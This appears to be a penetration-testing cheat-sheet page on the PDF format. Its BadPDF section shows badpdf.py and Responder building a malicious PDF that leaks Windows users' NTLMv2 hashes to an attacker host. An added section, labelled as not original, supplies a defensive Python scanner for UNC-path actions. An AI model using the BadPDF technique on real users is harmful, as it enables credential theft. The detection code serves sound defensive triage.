PDF

The PDF file type, short for Portable Document Format, is a platform-independent standard developed to present documents consistently across different systems, regardless of hardware, operating system, or software environment. A PDF encapsulates text, images, vector graphics, annotations, form fields, and metadata into a single file, preserving layout and design exactly as intended. This consistency has made PDF the dominant format for electronic documents in business, legal, academic, and government contexts.

Internally, a PDF is structured around a sequence of objects defined in a self-describing syntax, managed by a cross-reference table that enables random access to its contents. The format supports advanced features such as embedded fonts, digital signatures, encryption, JavaScript, and interactive elements like forms and multimedia. While these capabilities make PDFs highly flexible, they also introduce security concerns. Embedded scripts, file attachments, and poorly implemented parser logic have historically been leveraged to deliver malicious content or trigger vulnerabilities.

BadPDF

For Windows targets, we can create and upload a malicious PDF file and attempt to steal the user's NTLMv2 hash using badpdf.py:

$ sudo python2 badpdf.py

Responder detected :/usr/sbin/responder
Please enter Bad-PDF host IP: 
10.10.14.2
Please enter output file name: 
malicious.pdf
Please enter the interface name to listen(Default eth0): 
tun0
[*] Starting Process.. [*]
Bad PDF malicious.pdf created
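
For triaging uploaded PDFs on the defending side, the following is an added example, not part of the original page or of badpdf.py. It assumes that a PDF built to leak NTLMv2 hashes carries an action whose file specification points at a UNC path; the function names, the sample documents and the 192.0.2.10 address are constructed for illustration.

```python
import re
import zlib

# Action types whose /F file specification can name a file outside the document.
ACTION_RE = re.compile(rb"/S\s*/(GoToR|GoToE|Launch)\b")
LITERAL_RE = re.compile(rb"/U?F\s*\(((?:\\.|[^\\()])*)\)", re.S)  # /F (string)
HEX_RE = re.compile(rb"/U?F\s*<([0-9A-Fa-f\s]*)>")                # /F <hex>
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.S)
ESCAPE_RE = re.compile(rb"\\([0-7]{1,3}|[\\()])")  # octal, \\, \( and \)

def expand(data):
    """Return the raw bytes plus every stream that inflates as Flate data."""
    parts = [data]
    for m in STREAM_RE.finditer(data):
        try:
            parts.append(zlib.decompressobj().decompress(m.group(1)))
        except zlib.error:
            pass  # other filter, encrypted, or not compressed
    return b"\n".join(parts)

def unescape(m):
    """Decode one PDF literal-string escape (octal code or escaped character)."""
    return bytes([int(m[1], 8) & 0xFF]) if m[1][:1].isdigit() else m[1]

def file_specs(data):
    """Yield decoded /F and /UF string values (nested parentheses not handled)."""
    for m in LITERAL_RE.finditer(data):
        yield ESCAPE_RE.sub(unescape, m.group(1))
    for m in HEX_RE.finditer(data):
        digits = re.sub(rb"\s", b"", m.group(1))
        yield bytes.fromhex((digits + b"0" * (len(digits) % 2)).decode())

def scan_pdf(data):
    """Report external-file actions and any file specification that is a UNC path."""
    data = expand(data)
    actions = sorted({m.group(1).decode() for m in ACTION_RE.finditer(data)})
    unc = sorted({s.decode("latin-1") for s in file_specs(data)
                  if s.startswith(b"\\\\")})
    return {"actions": actions, "unc_targets": unc,
            "suspicious": bool(actions and unc)}

# Constructed samples (192.0.2.10 is a documentation address, not from the page).
UNC_ACTION = b"<< /S /GoToR /F (\\\\\\\\192.0.2.10\\\\share\\\\a.pdf) >>"
SAMPLE_PLAIN = b"%PDF-1.7\n1 0 obj\n" + UNC_ACTION + b"\nendobj\n"
SAMPLE_FLATE = (b"%PDF-1.7\n2 0 obj\n<< /Filter /FlateDecode >>\nstream\n"
                + zlib.compress(UNC_ACTION) + b"\nendstream\nendobj\n")
SAMPLE_BENIGN = b"%PDF-1.7\n3 0 obj\n<< /S /GoToR /F (appendix.pdf) >>\nendobj\n"
```

A hit is a triage lead rather than a verdict: encrypted documents, streams using filters other than Flate, and strings with nested parentheses are not decoded here, so a clean result does not prove the file is safe.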
